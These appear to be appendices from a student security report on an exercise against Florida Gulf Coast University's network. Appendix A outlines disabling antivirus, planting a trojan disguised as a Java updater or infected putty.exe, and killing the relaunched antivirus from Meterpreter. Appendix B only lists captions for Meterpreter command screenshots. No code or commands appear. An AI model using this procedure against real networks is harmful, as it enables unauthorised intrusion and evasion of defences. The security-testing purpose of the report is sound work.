Appendix A: Steps for performing a hack on FGCU’s network
As an exercise in checking security violations and protection, an attempt was made to
check the vulnerability of Florida Gulf Coast University’s enterprise network. The following
actions were performed to prove the vulnerability.
Step one: Stopping the Antivirus on the targeted computer
This can be done with a couple of simple system calls from a C++ program. As
proven by Chris Ruskai, writing a simple C++ program that suspends and disables the
antivirus is possible. The code is not included in the report but was submitted
separately to the instructor.
Step two: Placing Infected Program on the targeted computer
Create an exploit, as described in the previous section, that runs automatically, for
example as the Java updater. This allows the attack to go completely unnoticed.
Another way is to use the infected putty.exe, which automatically connects to another
computer. Then shut down the computer.
Step three: Waiting for the connection between the attacking computer and the targeted
computer.
Once the targeted computer is started, the Trojan will be launched and the
listening attacking computer will then have complete access to the targeted
computer.
Notes: Although this procedure allows complete access to the targeted computer and its
system, one only has a window of about 30-45 minutes before the antivirus is automatically
launched again over the network, because of the security procedure in place on the
enterprise network. If one studies the protection system well enough, once it launches again it
can be killed from Meterpreter before it removes the Trojan.
Figure A.1: Diagram of the Network
Appendix B: Exploit Commands
This Appendix includes screenshots of specific commands, which are useful for
performing an attack.
Figure B.1 Core Commands
Figure B.2 File System Commands.
Figure B.3 Networking Commands.
Figure B.4 System Commands.
Figure B.5 User Interface Commands.
Figure B.6 Webcam Commands.
Figure B.7 Elevate Commands.
Figure B.8 Passwords Database Commands.
Figure B.9 Timestomp Commands.
Figure B.1 Core Commands.
Figure B.2 File System Commands.
Figure B.3 Networking Commands.
Figure B.4 System Commands.
Figure B.5 User Interface Commands.
Figure B.6 Webcam Commands.
Figure B.7 Elevate Commands.
Figure B.8 Passwords Database Commands.
Figure B.9 Timestomp Commands.